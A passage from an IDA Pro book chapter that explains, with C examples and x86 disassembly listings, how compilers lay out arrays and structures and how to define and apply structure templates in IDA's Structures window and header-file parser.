listing. Note that this particular formatting highlights the use of offsets into

the array:

.text:0040100B mov dword_40B720, 10

.text:00401015 mov dword_40B720+4, 20

.text:0040101F mov dword_40B720+8, 30

There are two points to note in this example. First, when constant

indexes are used to access global arrays, the corresponding array elements

will appear as global variables in the corresponding disassembly. In other

words, the disassembly will offer essentially no evidence that an array exists.

The second point is that the use of variable index values leads us to the start

of the array because the base address will be revealed (as in [) when the

computed offset is added to it to compute the actual array location to be

accessed. The computation at [ offers one additional piece of significant

information about the array. By observing the amount by which the array

index is multiplied (4 in this case), we learn the size (though not the type)

of an individual element in the array.

Stack-Allocated Arrays

How does array access differ if the array is allocated as a stack variable instead?

Instinctively, we might think that it must be different since the compiler can’t

know an absolute address at compile time, so surely even accesses that use

constant indexes must require some computation at runtime. In practice,

however, compilers treat stack-allocated arrays almost identically to globally

allocated arrays.

Consider the following program that makes use of a small stack-allocated

array:

int main() {

int stack_array[3];

int idx = 2;

stack_array[0] = 10;

stack_array[1] = 20;

stack_array[2] = 30;

stack_array[idx] = 40;

}

Datatypes and Data Structures 133

The address at which stack_array will be allocated is unknown at compile

time, so it is not possible for the compiler to precompute the address of

stack_array[1] at compile time as it did in the global array example. By exam-

ining the disassembly listing for this function, we gain insight into how stack-

allocated arrays are accessed:

.text:00401000 _main proc near

.text:00401000

.text:00401000 var_10 = dword ptr -10h

.text:00401000 var_C = dword ptr -0Ch

.text:00401000 var_8 = dword ptr -8

.text:00401000 idx = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 10h

.text:00401006 mov [ebp+idx], 2

.text:0040100D Xmov [ebp+var_10], 10

.text:00401014 Ymov [ebp+var_C], 20

.text:0040101B Zmov [ebp+var_8], 30

.text:00401022 mov eax, [ebp+idx]

.text:00401025 [mov [ebp+eax*4+var_10], 40

.text:0040102D xor eax, eax

.text:0040102F mov esp, ebp

.text:00401031 pop ebp

.text:00401032 retn

.text:00401032 _main endp

As with the global array example, this function appears to have three

variables (var_10, var_C, and var_8) rather than an array of three integers.

Based on the constant operands used at X, Y, and Z, we know that what

appear to be local variable references are actually references to the three

elements of stack_array whose first element must reside at var_10, the local

variable with the lowest memory address.

To understand how the compiler resolved the references to the other

elements of the array, consider what the compiler goes through when deal-

ing with the reference to stack_array[1], which lies 4 bytes into the array, or

4 bytes beyond the location of var_10. Within the stack frame, the compiler

has elected to allocate stack_array at ebp - 0x10. The compiler understands

that stack_array[1] lies at ebp - 0x10 + 4, which simplifies to ebp - 0x0C. The

result is that IDA displays this as a local variable reference. The net effect

is that, similar to globally allocated arrays, the use of constant index values

tends to hide the presence of a stack-allocated array. Only the array access at

[ hints at the fact that var_10 is the first element in the array rather than a

simple integer variable. In addition, the disassembly line at [ also helps us

conclude that the size of individual elements in the array is 4 bytes.

134 Chapter 8

Stack-allocated arrays and globally allocated arrays are thus treated very

similarly by compilers. However, there is an extra piece of information that

we can attempt to extract from the disassembly of the stack example. Based

on the location of idx within the stack, it is possible to conclude that the array

that begins with var_10 contains no more than three elements (otherwise, it

would overwrite idx). If you are an exploit developer, this can be very useful

in determining exactly how much data you can fit into an array before you

overflow it and begin to corrupt the data that follows.

Heap-Allocated Arrays

Heap-allocated arrays are allocated using a dynamic memory allocation

function such as malloc (C) or new (C++). From the compiler’s perspective,

the primary difference in dealing with a heap-allocated array is that the

compiler must generate all references into the array based on the address

value returned from the memory allocation function. For the sake of com-

parison, we now take a look at the following function, which allocates a

small array in the program heap:

int main() {

int *heap_array = (int*)malloc(3 * sizeof(int));

int idx = 2;

heap_array[0] = 10;

heap_array[1] = 20;

heap_array[2] = 30;

heap_array[idx] = 40;

}

In studying the corresponding disassembly that follows, you should notice

a few similarities and differences with the two previous disassemblies:

.text:00401000 _main proc near

.text:00401000

.text:00401000 heap_array = dword ptr -8

.text:00401000 idx = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 8

.text:00401006 \push 0Ch ; size_t

.text:00401008 call _malloc

.text:0040100D add esp, 4

.text:00401010 mov [ebp+heap_array], eax

.text:00401013 mov [ebp+idx], 2

.text:0040101A mov eax, [ebp+heap_array]

.text:0040101D Xmov dword ptr [eax], 10

.text:00401023 mov ecx, [ebp+heap_array]

.text:00401026 Ymov dword ptr [ecx+4], 20

.text:0040102D mov edx, [ebp+heap_array]

.text:00401030 Zmov dword ptr [edx+8], 30

Datatypes and Data Structures 135

.text:00401037 mov eax, [ebp+idx]

.text:0040103A mov ecx, [ebp+heap_array]

.text:0040103D [mov dword ptr [ecx+eax*4], 40

.text:00401044 xor eax, eax

.text:00401046 mov esp, ebp

.text:00401048 pop ebp

.text:00401049 retn

.text:00401049 _main endp

The starting address of the array (returned from malloc in the EAX regis-

ter) is stored in the local variable heap_array. In this example, unlike the pre-

vious examples, every access to the array begins with reading the contents

of heap_array to obtain the array’s base address before an offset value can be

added to compute the address of the correct element within the array. The

references to heap_array[0], heap_array[1], and heap_array[2] require offsets of

0, 4, and 8 bytes, respectively, as seen at X, Y, and Z. The operation that most

closely resembles the previous examples is the reference to heap_array[idx] at

[, in which the offset into the array continues to be computed by multiply-

ing the array index by the size of an array element.

Heap-allocated arrays have one particularly nice feature. When both the

total size of the array and the size of each element can be determined, it is

easy to compute the number of elements allocated to the array. For heap-

allocated arrays, the parameter passed to the memory allocation function

(0x0C passed to malloc at \) represents the total number of bytes allocated

to the array. Dividing this by the size of an element (4 bytes in this example,

as observed from the offsets at X, Y, and Z) tells us the number of elements

in the array. In the previous example, a three-element array was allocated.

The only firm conclusion we can draw regarding the use of arrays is that

they are easiest to recognize when a variable is used as an index into the

array. The array-access operation requires the index to be scaled by the size

of an array element before adding the resulting offset to the base address of

the array. Unfortunately, as we will show in the next section, when constant

index values are used to access array elements, they do little to suggest the

presence of an array and look remarkably similar to code used to access

structure members.

Structure Member Access

C-style structs, referred to here generically as structures, are heterogeneous

collections of data that allow grouping of items of dissimilar datatypes into a

single composite datatype. A major distinguishing feature of structures is that

the data fields within a structure are accessed by name rather than by index,

as is done with arrays. Unfortunately, field names are converted to numeric

offsets by the compiler, so by the time you are looking at a disassembly, struc-

ture field access looks remarkably similar to accessing array elements using

constant indexes.

136 Chapter 8

When a compiler encounters a structure definition, the compiler main-

tains a running total of the number of bytes consumed by the fields of the

structure in order to determine the offset at which each field resides within

the structure. The following structure definition will be used with the upcom-

ing examples:

struct ch8_struct { //Size Minimum offset Default offset

int field1; // 4 0 0

short field2; // 2 4 4

char field3; // 1 6 6

int field4; // 4 7 8

double field5; // 8 11 16

}; //Minimum total size: 19 Default size: 24

The minimum required space to allocate a structure is determined by

the sum of the space required to allocate each field within the structure.

However, you should never assume that a compiler utilizes the minimum

required space to allocate a structure. By default, compilers seek to align

structure fields to memory addresses that allow for the most efficient reading

and writing of those fields. For example, 4-byte integer fields will be aligned

to offsets that are divisible by 4, while 8-byte doubles will be aligned to offsets

that are divisible by 8. Depending on the composition of the structure, meet-

ing alignment requirements may require the insertion of padding bytes,

causing the actual size of a structure to be larger than the sum of its compo-

nent fields. The default offsets and resulting structure size for the example

structure shown previously can be seen in the Default offset column.

Structures can be packed into the minimum required space by using

compiler options to request specific member alignments. Microsoft Visual

C/C++ and GNU gcc/g++ both recognize the pack pragma as a means of

controlling structure field alignment. The GNU compilers additionally rec-

ognize the packed attribute as a means of controlling structure alignment on

a per-structure basis. Requesting 1-byte alignment for structure fields causes

compilers to squeeze the structure into the minimum required space. For

our example structure, this yields the offsets and structure size found in the

Minimum offset column. Note that some CPUs perform better when data is

aligned according to its type, while other CPUs may generate exceptions if

data is not aligned on specific boundaries.

With these facts in mind, we can begin our look at how structures are

treated in compiled code. For the sake of comparison, it is worth observing

that, as with arrays, access to structure members is performed by adding the

base address of the structure to the offset of the desired member. However,

while array offsets can be computed at runtime from a provided index value

(because each item in an array has the same size), structure offsets must be

Datatypes and Data Structures 137

precomputed and will turn up in compiled code as fixed offsets into the

structure, looking nearly identical to array references that make use of con-

stant indexes.

Globally Allocated Structures

As with globally allocated arrays, the address of globally allocated structures

is known at compile time. This allows the compiler to compute the address of

each member of the structure at compile time and eliminates the need to do

any math at runtime. Consider the following program that accesses a globally

allocated structure:

struct ch8_struct global_struct;

int main() {

global_struct.field1 = 10;

global_struct.field2 = 20;

global_struct.field3 = 30;

global_struct.field4 = 40;

global_struct.field5 = 50.0;

}

If this program is compiled with default structure alignment options, we

can expect to see something like the following when we disassemble it:

.text:00401000 _main proc near

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 mov dword_40EA60, 10

.text:0040100D mov word_40EA64, 20

.text:00401016 mov byte_40EA66, 30

.text:0040101D mov dword_40EA68, 40

.text:00401027 fld ds:dbl_40B128

.text:0040102D fstp dbl_40EA70

.text:00401033 xor eax, eax

.text:00401035 pop ebp

.text:00401036 retn

.text:00401036 _main endp

This disassembly contains no math whatsoever to access the members of

the structure, and, in the absence of source code, it would not be possible to

state with any certainty that a structure is being used at all. Because the com-

piler has performed all of the offset computations at compile time, this pro-

gram appears to reference five global variables rather than five fields within a

single structure. You should be able to note the similarities with the previous

example regarding globally allocated arrays using constant index values.

138 Chapter 8

Stack-Allocated Structures

Like stack-allocated arrays (see page 132), stack-allocated structures are

equally difficult to recognize based on stack layout alone. Modifying the pre-

ceding program to use a stack-allocated structure, declared in main, yields the

following disassembly:

.text:00401000 _main proc near

.text:00401000

.text:00401000 var_18 = dword ptr -18h

.text:00401000 var_14 = word ptr -14h

.text:00401000 var_12 = byte ptr -12h

.text:00401000 var_10 = dword ptr -10h

.text:00401000 var_8 = qword ptr -8

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 18h

.text:00401006 mov [ebp+var_18], 10

.text:0040100D mov [ebp+var_14], 20

.text:00401013 mov [ebp+var_12], 30

.text:00401017 mov [ebp+var_10], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_8]

.text:00401027 xor eax, eax

.text:00401029 mov esp, ebp

.text:0040102B pop ebp

.text:0040102C retn

.text:0040102C _main endp

Again, no math is performed to access the structure’s fields since the

compiler can determine the relative offsets for each field within the stack

frame at compile time. In this case, we are left with the same, potentially mis-

leading picture that five individual variables are being used rather than a single

variable that happens to contain five distinct fields. In reality, var_18 should be

the start of a 24-byte structure, and each of the other variables should some-

how be formatted to reflect the fact that they are fields within the structure.

Heap-Allocated Structures

Heap-allocated structures turn out to be much more revealing regarding the

size of the structure and the layout of its fields. When a structure is allocated

in the program heap, the compiler has no choice but to generate code to

compute the proper offset into the structure whenever a field is accessed.

This is a result of the structure’s address being unknown at compile time. For

globally allocated structures, the compiler is able to compute a fixed starting

address. For stack-allocated structures, the compiler can compute a fixed

relationship between the start of the structure and the frame pointer for the

Datatypes and Data Structures 139

enclosing stack frame. When a structure has been allocated in the heap, the

only reference to the structure available to the compiler is the pointer to the

structure’s starting address.

Modifying our structure example once again to make use of a heap-

allocated structure results in the following disassembly. Similar to the

heap-allocated array example from page 134, we declare a pointer within

main and assign it the address of a block of memory large enough to hold

our structure:

.text:00401000 _main proc near

.text:00401000

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 push ecx

.text:00401004 ]push 24 ; size_t

.text:00401006 call _malloc

.text:0040100B add esp, 4

.text:0040100E mov [ebp+heap_struct], eax

.text:00401011 mov eax, [ebp+heap_struct]

.text:00401014 Xmov dword ptr [eax], 10

.text:0040101A mov ecx, [ebp+heap_struct]

.text:0040101D Ymov word ptr [ecx+4], 20

.text:00401023 mov edx, [ebp+heap_struct]

.text:00401026 Zmov byte ptr [edx+6], 30

.text:0040102A mov eax, [ebp+heap_struct]

.text:0040102D [mov dword ptr [eax+8], 40

.text:00401034 mov ecx, [ebp+heap_struct]

.text:00401037 fld ds:dbl_40B128

.text:0040103D \fstp qword ptr [ecx+10h]

.text:00401040 xor eax, eax

.text:00401042 mov esp, ebp

.text:00401044 pop ebp

.text:00401045 retn

.text:00401045 _main endp

In this example, unlike the global and stack-allocated structure exam-

ples, we are able to discern the exact size and layout of the structure. The

structure size can be inferred to be 24 bytes based on the amount of memory

requested from malloc ]. The structure contains the following fields at the

indicated offsets:

zA 4-byte (dword) field at offset 0 X

zA 2-byte (word) field at offset 4 Y

zA 1-byte field at offset 6 Z

zA 4-byte (dword) field at offset 8 [

zAn 8-byte (qword) field at offset 16 (10h) \

140 Chapter 8

Based on the use of floating point instructions, we can further deduce

that the qword field is actually a double. The same program compiled to pack

structures with a 1-byte alignment yields the following disassembly:

.text:00401000 _main proc near

.text:00401000

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 push ecx

.text:00401004 push 19 ; size_t

.text:00401006 call _malloc

.text:0040100B add esp, 4

.text:0040100E mov [ebp+heap_struct], eax

.text:00401011 mov eax, [ebp+heap_struct]

.text:00401014 mov dword ptr [eax], 10

.text:0040101A mov ecx, [ebp+heap_struct]

.text:0040101D mov word ptr [ecx+4], 20

.text:00401023 mov edx, [ebp+heap_struct]

.text:00401026 mov byte ptr [edx+6], 30

.text:0040102A mov eax, [ebp+heap_struct]

.text:0040102D mov dword ptr [eax+7], 40

.text:00401034 mov ecx, [ebp+heap_struct]

.text:00401037 fld ds:dbl_40B128

.text:0040103D fstp qword ptr [ecx+0Bh]

.text:00401040 xor eax, eax

.text:00401042 mov esp, ebp

.text:00401044 pop ebp

.text:00401045 retn

.text:00401045 _main endp

The only changes to the program are the smaller size of the structure

(now 19 bytes) and the adjusted offsets to account for the realignment of

each structure field.

Regardless of the alignment used when compiling a program, finding

structures allocated and manipulated in the program heap is the fastest way

to determine the size and layout of a given data structure. However, keep in

mind that many functions will not do you the favor of immediately accessing

every member of a structure to help you understand the structure’s layout.

Instead, you may need to follow the use of the pointer to the structure and

make note of the offsets used whenever that pointer is dereferenced. In this

manner, you will eventually be able to piece together the complete layout of

the structure.

Arrays of Structures

Some programmers would say that the beauty of composite data structures is

that they allow you to build arbitrarily complex structures by nesting smaller

structures within larger structures. Among other possibilities, this capability

allows for arrays of structures, structures within structures, and structures

Datatypes and Data Structures 141

that contain arrays as members. The preceding discussions regarding arrays

and structures apply just as well when dealing with nested types such as these.

As an example, consider an array of structures like the following simple pro-

gram in which heap_struct points to an array of five ch8_struct items:

int main() {

int idx = 1;

struct ch8_struct *heap_struct;

heap_struct = (struct ch8_struct*)malloc(sizeof(struct ch8_struct) * 5);

Xheap_struct[idx].field1 = 10;

}

The operations required to access field1 at X include multiplying the

index value by the size of an array element, in this case the size of the struc-

ture, and then adding the offset to the desired field. The corresponding dis-

assembly is shown here:

.text:00401000 _main proc near

.text:00401000

.text:00401000 idx = dword ptr -8

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 8

.text:00401006 mov [ebp+idx], 1

.text:0040100D Ypush 120 ; size_t

.text:0040100F call _malloc

.text:00401014 add esp, 4

.text:00401017 mov [ebp+heap_struct], eax

.text:0040101A mov eax, [ebp+idx]

.text:0040101D Zimul eax, 24

.text:00401020 mov ecx, [ebp+heap_struct]

.text:00401023 [mov dword ptr [ecx+eax], 10

.text:0040102A xor eax, eax

.text:0040102C mov esp, ebp

.text:0040102E pop ebp

.text:0040102F retn

.text:0040102F _main endp

The disassembly reveals 120 bytes (Y) being requested from the heap.

The array index is multiplied by 24 at Z before being added to the start

address for the array at [. No additional offset is required in order to gener-

ate the final address for the reference at [. From these facts we can deduce

the size of an array item (24), the number of items in the array (120 / 24 = 5),

and the fact that there is a 4-byte (dword) field at offset 0 within each array ele-

ment. This short listing does not offer enough information to draw any con-

clusions about how the remaining 20 bytes within each structure are

allocated to additional fields.

142 Chapter 8

Creating IDA Structures

In the last chapter we saw how IDA’s array-aggregation capabilities allow dis-

assembly listings to be simplified by collapsing long lists of data declarations

into a single disassembly line. In the next few sections we take a look at IDA’s

facilities for improving the readability of code that manipulates structures.

Our goal is to move away from structure references such as [edx + 10h] and

toward something more readable like [edx + ch8_struct.field5].

Whenever you discover that a program is manipulating a data structure,

you need to decide whether you want to incorporate structure field names

into your disassembly or whether you can make sense of all the numeric off-

sets sprinkled throughout the listing. In some cases, IDA may recognize the

use of a structure defined as part of the C standard library or the Windows

API. In such cases, IDA may have knowledge of the exact layout of the struc-

ture and be able to convert numeric offsets into more symbolic field names.

This is the ideal case, as it leaves you with a lot less work to do. We will return

to this scenario once we understand a little more about how IDA deals with

structure definitions in general.

Creating a New Structure (or Union)

When a program appears to be using a structure for which IDA has no layout

knowledge, IDA offers facilities for specifying the composition of the struc-

ture and having the newly defined structure incorporated into the disassem-

bly. Structure creation in IDA takes place within the Structures window (see

Figure 8-2). No structure can be incorporated into a disassembly until it is

first listed in the Structures window. Any structure that is known to IDA and

that is recognized to be used by a program will automatically be listed in the

Structures window.

Figure 8-2: The Structures window

There are two reasons why the use of a structure may go unrecognized

during the analysis phase. First, even though IDA may have knowledge of a

particular structure’s layout, there may be insufficient information for IDA to

conclude that the program utilizes the structure. Second, the structure may

be a nonstandard structure that IDA knows nothing about. In both cases the

problem can be overcome, and in both cases the solution begins with the

Structures window.

Datatypes and Data Structures 143

The first four lines of text in the Structures window serve as a constant

reminder of the operations that are possible within the window. The princi-

pal operations we are concerned with involve adding, removing, and editing

structures. Adding a structure is initiated using the INSERT key, which opens

the Create Structure/Union dialog shown in Figure 8-3.

Figure 8-3: The Create Structure/Union dialog

In order to create a new structure, you must first specify the name in the

Structure name field. The first two checkboxes determine where or whether

the new structure will be displayed within the Structures window. The third

checkbox, Create union, specifies whether you are defining a structure or a

C-style union.3 For structures, the size is computed as the sum of the sizes of

each component field, while for unions, the size is computed as the size of the

largest component field. The Add standard structure button is used to access

the list of all structure datatypes that IDA is currently aware of. The behavior of

this button is discussed in “Using Standard Structures” on page 151. Once you

specify a structure name and click OK, an empty structure definition will be

created in the Structures window, as shown in Figure 8-4.

Figure 8-4: An empty structure definition

This structure definition must be edited to complete the definition of

the structure layout.

3. A union is similar to a struct in that it may consist of many named fields, each of differing type.

The difference between the two lies in the fact that fields within a union directly overlap one

another so that the size of a union is equal to the size of the largest field.

144 Chapter 8

Editing Structure Members

In order to add fields to your new structure, you must make use of the field-

creation commands D, A, and the asterisk key (*) on the numeric keypad.

Initially, only the D command is useful, and unfortunately, its behavior is

highly dependent on the location of the cursor. For that reason, the follow-

ing steps are recommended for adding fields to a structure.

1. To add a new field to a structure, position the cursor on the last line

of the structure definition (the one containing ends) and press D. This

causes a new field to be added to the end of the structure. The size of

the new field will be set according to the first size selected on the data

carousel (Chapter 7). The name of the field will initially be field_N,

where N is the numeric offset from the start of the structure to the start

of the new field (field_0, for example).

2. Should you need to modify the size of the field, you may do so by first

ensuring that the cursor is positioned on the new field name and then

selecting the correct data size for the field by repeatedly pressing D in

order to cycle through the datatypes on the data carousel. Alternatively,

you may use OptionsSetup Data Types to specify a size that is not avail-

able on the data carousel. If the field is an array, right-click the name and

select Array to open the array specification dialog (Chapter 7).

3. To change the name of a structure field, click the field name and use the

N hotkey, or right-click the name and select Rename; then provide a new

name for the field.

The following helpful hints may be of use as you define your own

structures.

zThe byte offset to a field is displayed as an eight-digit hex value on the

left side of the Structures window.

zEvery time you add or delete a structure field or change the size of an

existing field, the new sizeof the structure will be reflected on the first

line of the structure definition.

zYou can add comments to a structure field just as you can add comments

to any disassembly line. Right-click (or use a hotkey) on the field you

wish to add a comment to and select one of the available comment

options.

zContrary to the instructions at the top of the Structures window, the U

key will delete a structure field only if it is the last field in the structure.

For all other fields, pressing U merely undefines the field, which removes

the name but does not remove the bytes allocated to the field.

zYou are responsible for proper alignment of all fields within a structure

definition. IDA makes no distinction between packed or unpacked struc-

tures. If you require padding bytes to properly align fields, then you are

Datatypes and Data Structures 145

responsible for adding them. Padding bytes are best added as dummy

fields of the proper size, which you may or may not choose to undefine

once you have added additional fields.

zBytes allocated in the middle of a structure can be removed only by first

undefining the associated field and then selecting EditShrink Struct

Type to remove the undefined bytes.

zBytes may be inserted into the middle of a structure by selecting the field

that will follow the new bytes and then using EditExpand Struct Type

to insert a specified number of bytes before the selected field.

zIf you know the size of a structure but not the layout, you need to create

two fields. The first field should be an array of size-1 bytes. The second

field should be a 1-byte field. After you have created the second field,

undefine the first (array) field. The size of the structure will be pre-

served, and you can easily come back later to define fields and their sizes

as you learn more about the layout of the structure.

Through repeated application of these steps (add field, set field size, add

padding, and so on), you can create an IDA representation of the ch8_struct

(unpacked version), as shown in Figure 8-5.

Figure 8-5: Manually generated definition of the ch8_struct

In this example, padding bytes have been included to achieve proper

field alignment, and fields have been renamed according to the names used

in the preceding examples. Note that the offsets to each field and the overall

size (24 bytes) of the structure match the values seen in the earlier examples.

If you ever feel that a structure definition is taking up too much space in

your Structures window, you can collapse the definition into a one-line sum-

mary by choosing any field within the structure and pressing the minus key

(–) on the numeric keypad. This is useful once a structure has been com-

pletely defined and requires little further editing. The collapsed version of

ch8_struct is shown in Figure 8-6.

146 Chapter 8

The majority of structures that IDA is already aware of will be displayed

in this one-line fashion since it is not expected that they will need to be

edited. The collapsed display provides a reminder that you can use the plus

key (+) on the numeric keypad to expand the definition. Alternatively, dou-

ble-clicking the name of the structure will also expand the definition.

Figure 8-6: A collapsed structure definition

Stack Frames as Specialized Structures

You may notice that structure definitions look somewhat similar to the

detailed stack frame views associated with functions. This is no accident, as

internally IDA treats both identically. Both represent contiguous blocks of

bytes that can be subdivided into named component fields, each associated

with a numeric offset into the structure. The minor difference is that stack

frames utilize both positive and negative field offsets centered on a frame

pointer or return address, while structures use positive offsets from the

beginning of the structure.

Using Structure Templates

There are two ways to make use of structure definitions in your disassemblies.

First, you can reformat memory references to make them more readable by

converting numeric structure offsets such as [ebx+8] into symbolic references

such as [ebx+ch8_struct.field4]. The latter form provides far more informa-

tion about what is being referenced. Because IDA uses a hierarchical nota-

tion, it is clear exactly what type of structure, and exactly which field within

that structure, is being accessed. This technique for applying structure tem-

plates is most often used when a structure is being referenced through a

pointer. The second way to use structure templates is to provide additional

datatypes that can be applied to stack and global variables.

In order to understand how structure definitions can be applied to

instruction operands, it is helpful to view each definition as something simi-

lar to set of enumerated constants. For example, the definition of ch8_struct

in Figure 8-5 might be expressed in pseudo-C as the following:

enum {

ch8_struct.field1 = 0,

ch8_struct.field2 = 4,

ch8_struct.field3 = 6,

Datatypes and Data Structures 147

ch8_struct.field4 = 8,

ch8_struct.field5 = 16

};

Given such a definition, IDA allows you to reformat any constant value

used in an operand into an equivalent symbolic representation. Figure 8-7

shows just such an operation in progress. The memory reference [ecx+10h]

may represent an access to field5 within a ch8_struct.

Figure 8-7: Applying a structure offset

The Structure offset option, available by right-clicking 10h in this case,

offers three alternatives for formatting the instruction operand. The alterna-

tives are pulled from the set of structures containing a field whose offset is 16.

As an alternative to formatting individual memory references, stack and

global variables can be formatted as entire structures. To format a stack vari-

able as a structure, open the detailed stack frame view by double-clicking the

variable to be formatted as a structure and then use EditStruct Var (ALT-Q)

to display a list of known structures similar to that shown in Figure 8-8.

Figure 8-8: The structure selection dialog

Selecting one of the available structures combines the corresponding

number of bytes in the stack into the corresponding structure type and refor-

mats all related memory references as structure references. The following

148 Chapter 8

code is an excerpt from the stack-allocated structure example we examined

previously:

.text:00401006 mov [ebp+var_18], 10

.text:0040100D mov [ebp+var_14], 20

.text:00401013 mov [ebp+var_12], 30

.text:00401017 mov [ebp+var_10], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_8]

Recall that we concluded that var_18 is actually the first field in a 24-byte

structure. The detailed stack frame for this particular interpretation is shown

in Figure 8-9.

Figure 8-9: Stack allocated structure prior to formatting

Selecting var_18 and formatting it as a ch8_struct (EditStruct Var) col-

lapses the 24 bytes (the size of ch8_struct) beginning at var_18 into a single

variable, resulting in the reformatted stack display shown in Figure 8-10. In

this case, applying the structure template to var_18 will generate a warning

message indicating that some variables will be destroyed in the process of

converting var_18 into a structure. Based on our earlier analysis, this is to be

expected, so we simply acknowledge the warning to complete the operation.

Figure 8-10: Stack allocated structure after formatting

Datatypes and Data Structures 149

Following reformatting, IDA understands that any memory reference

into the 24-byte block allocated to var_18 must refer to a field within the

structure. When IDA encounters such a reference, it makes every effort to

resolve the memory reference to one of the defined fields within the struc-

ture variable. In this case, the disassembly is automatically reformatted to

incorporate the structure layout, as shown here:

.text:00401006 mov [ebp+var_18.field1], 10

.text:0040100D mov [ebp+var_18.field2], 20

.text:00401013 mov [ebp+var_18.field3], 30

.text:00401017 mov [ebp+var_18.field4], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_18.field5]

The advantage to using structure notation within the disassembly is an

overall improvement in the readability of the disassembly. The use of field

names in the reformatted display provides a much more accurate reflection

of how data was actually manipulated in the original source code.

The procedure for formatting global variables as structures is nearly

identical to that used for stack variables. To do so, select the variable or

address that marks the beginning of the structure and use EditStruct Var

(ALT-Q) to choose the appropriate structure type. As an alternative for unde-

fined global data only (not stack data), you may use IDA’s context-sensitive

menu, and select the structure option to view and select an available struc-

ture template to apply at the selected address.

Importing New Structures

After working with IDA’s structure-creation and editing features for a while,

you may find yourself longing for an easier way to do things. Fortunately,

IDA does offer some shortcuts concerning new structures. IDA is capable of

parsing individual C (not C++) data declarations, as well as entire C header

files, and automatically building IDA structure representations for any struc-

tures defined in those declarations or header files. If you happen to have the

source code, or at least the header files, for the binary that you are reversing,

then you can save a lot of time by having IDA extract related structures

directly from the source code.

Parsing C Structure Declarations

A Local Types subview window is available by using the View

OpenSubviewsLocal Types command. The Local Types window displays

a list of all types that have been parsed into the current database. For new

databases, the Local Types window is initially empty, but the window offers

the capability to parse new types via the insert key or the Insert option from

the context menu. The resulting type entry dialog is shown in Figure 8-11.

150 Chapter 8

Figure 8-11: The Local Types entry dialog

Errors encountered while parsing the new type are displayed in the IDA

output window. If the type declaration is successfully parsed, the type and its

associated declaration are listed in the Local Types window, as shown in Fig-

ure 8-12.

Figure 8-12: The Local Types window

Note that the IDA parser utilizes a default structure member alignment

of 4 bytes. If your structure requires an alternate alignment, you may include

it, and IDA will recognize a pragma pack directive to specify the desired mem-

ber alignment.

Datatypes added to the Local Types windows are not immediately avail-

able via the Structures window. There are two methods for adding local type

declarations to the Structures window. The easiest method is to right-click

on the desired local type and select Synchronize to idb. Alternatively, as

each new type is added to a list of standard structures; the new type may be

imported into the Structures window as described in “Using Standard Struc-

tures” on page 151.

Parsing C Header Files

To parse a header file, use FileLoad FileParse C Header File to choose

the header you wish to parse. If all goes well, IDA returns the message:

Compilation successful. If the parser encounters any problems, you are noti-

fied that there were errors. Any associated error messages are displayed in

the IDA output window.

IDA adds all structures that were successfully parsed to both the list of

local types and the list of standard structures (to the end of the list to be

exact) available in the current database. When a new structure has the same

name as an existing structure, the existing structure definition is overwritten

Datatypes and Data Structures 151

with the new structure layout. None of the new structures appear in the

Structures window until you elect to explicitly add them, as described above

for local types or in“Using Standard Structures” on page 151.

When parsing C header files, it is useful to keep the following points

in mind:

zThe built-in parser does not necessarily use the same default structure

member alignment as your compiler, though it does honor the pack

pragma. By default, the parser creates structures that are 4-byte aligned.

zThe parser understands the C preprocessor include directive. To resolve

include directives, the parser searches the directory containing the file

being parsed as well as any directories listed as Include directories in the

OptionsCompiler configuration dialog.

zThe parser understands only C standard datatypes. However, the parser

also understands the preprocessor define directive as well as the C typedef

statement. Thus, types such as uint32_t will be correctly parsed if the

parser has encountered an appropriate typedef prior to their use.

zWhen you don’t have any source code, you may find it easier to quickly

define a structure layout in C notation using a text editor and parse the

resulting header file or paste the declaration as a new local type, rather

than using IDA’s cumbersome manual structure-definition tools.

zNew structures are available only in the current database. You must

repeat the structure-creation steps in each additional database for

which you wish to use the structures. We will discuss some steps for

simplifying this process when we discuss TIL files later in the chapter.

In general, to maximize your chances of successfully parsing a header

file, you will want to simplify your structure definitions as much as possible

through the use of standard C datatypes and minimizing the use of include

files. Remember, the most important thing about creating structures in IDA

is to ensure that the layout is correct. Correct layout depends far more on the

correct size of each field and the correct alignment of the structure than get-

ting the exact type of each field just right. In other words, if you need to

replace all occurrences of uint32_t with int in order to get a file to parse cor-

rectly, you should go right ahead and do it.

Using Standard Structures

As mentioned previously, IDA recognizes a tremendous number of data

structures associated with various library and API functions. When a database

is initially created, IDA attempts to determine the compiler and platform

associated with the binary and loads the structure templates derived from

related library header files. As IDA encounters actual structure manipula-

tions in the disassembly, it adds the appropriate structure definitions to the

Structures window. Thus, the Structures window represents the subset of

known structures that happen to apply to the current binary. In addition to

152 Chapter 8

creating your own custom structures, you can add additional standard struc-

tures to the Structures window by drawing from IDA’s list of known structure

types.

The process for adding a new structure begins by pressing the INSERT key

inside the Structures window. Figure 8-3 showed the Create Structure/Union

dialog, one component of which is the Add standard structure button. Click-

ing this button grants access to the master list of structures pertaining to the

current compiler (as detected during the analysis phase) and file format.

This master list of structures also contains any structures that have been

added to the database as a result of parsing C header files. The structure

selection dialog shown in Figure 8-13 is used to choose a structure to add

to the Structures window.

Figure 8-13: Standard structure selection

You may utilize the search functionality to locate structures based on a

partial text match. The dialog also allows for prefix matching. If you know

the first few characters of the structure name, simply type them in (they will

appear in the status bar at the bottom of the dialog), and the list display will

jump to the first structure with a matching prefix. Choosing a structure adds

the structure and any nested structures to the Structures window.

As an example of using standard structures, consider a case in which you

wish to examine the file headers associated with a Windows PE binary. By

default, the file headers are not loaded into the database when it is first cre-

ated; however, file headers can be loaded if you select the Manual load

option during initial database creation. Loading the file headers ensures

only that the data bytes associated with those headers will be present in the

database. In most cases, the headers will not be formatted in any way because

